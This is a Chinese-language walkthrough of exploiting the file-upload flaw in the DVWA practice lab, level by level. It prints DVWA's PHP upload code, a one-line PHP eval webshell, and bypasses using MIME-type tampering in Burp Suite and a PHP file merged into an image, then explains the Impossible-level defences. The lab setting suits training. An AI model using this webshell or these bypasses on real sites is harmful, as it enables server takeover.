文件上传漏洞:
文件上传漏洞是指由于服务器对于用户上传部分的控制不严格导致攻击者可以上传一个恶意的可执行文件到服务器。简单来说就是用户直接或者通过各种绕过方式将Webshell上传到服务器中进而执行利用,将利用文件上传漏洞,上传一句话木马,然后使用中国菜刀工具,控制整个网站后台!
保存Hack.php一句话木马:
<?php @eval($_POST['pass']);?>
接下来访问DVWA平台并登录:http://127.0.0.1:8088/DVWA/index.php
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
查看后台Low安全级别源码:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
注:从源码中发现Low级别未对上传的文件进行任何验证,所以可以直接上传PHP或者ASP一句话木马,此例演示php,将准备好的一句话木马直接上传,然后就可以看到回显路径:
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
接着就可以用菜刀连接,菜刀界面右键,然后点击添加填写相关数据:
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
连接成功界面:
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
接着双击或者右键文件管理:
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
进入网站结构:
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
查看Medium安全级别后台源码:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
注:从源码中可以看出该Medium安全级别下的系统,上传文件时,对文件进行了后缀名验证,在if语句中判断上传文件类型是否为“image/jpeg”和大小是否小于100kb.
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
注:但是验证程序由本地JavaScript来进行,所以破解思路为先将一句话木马改名为符合要求的格式,然后使用Burp Suite进行抓包,修改上传文件类型即可:
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
注:然后使用菜刀连接并进行连接,通过分析说明客户端验证不能依靠,使用BurpSuite绕过客户端前端文件格式验证,所以为预防文件上传漏洞,需要在服务器进行文件格式验证即可.
查看High安全级别源码:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
注:可以看到High级别代码读取文件名中最后一个”.”后的字符串时,期望通过文件名来限制文件类型,因此要求上传文件名形式必须是“*.jpg”、“.jpeg” 、“*.png”之类。同时getimagesize()函数更是限制了上传文件的文件头必须为图像类型.
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
注:将上传文件文件头伪装成图片,首先利用copy命令将一句话木马文件Hack.php与正常的图片文件alone.jpg合并:
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
尝试将生成木马图片文件hack.jpg上传!
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
菜刀连接:
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
Kali Linux系统通过DVWA靶场测试文件上传漏洞:
查看Impossible安全级别源码:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
//$target_file = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
$target_file = md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
$temp_file = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
$temp_file .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
// Is it an image?
if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
( $uploaded_size < 100000 ) &&
( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
getimagesize( $uploaded_tmp ) ) {
// Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
if( $uploaded_type == 'image/jpeg' ) {
$img = imagecreatefromjpeg( $uploaded_tmp );
imagejpeg( $img, $temp_file, 100);
}
else {
$img = imagecreatefrompng( $uploaded_tmp );
imagepng( $img, $temp_file, 9);
}
imagedestroy( $img );
// Can we move the file to the web root from the temp folder?
if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
// Yes!
echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
}
else {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
// Delete any temp files
if( file_exists( $temp_file ) )
unlink( $temp_file );
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
注:可以看到Impossible级别代码对上传文件进行了重命名为md5值,导致%00截断无法绕过过滤规则,加入Anti-CSRF token防护CSRF攻击,同时对文件的内容作了严格的检查,导致攻击者无法上传含有恶意脚本文件!
网友评论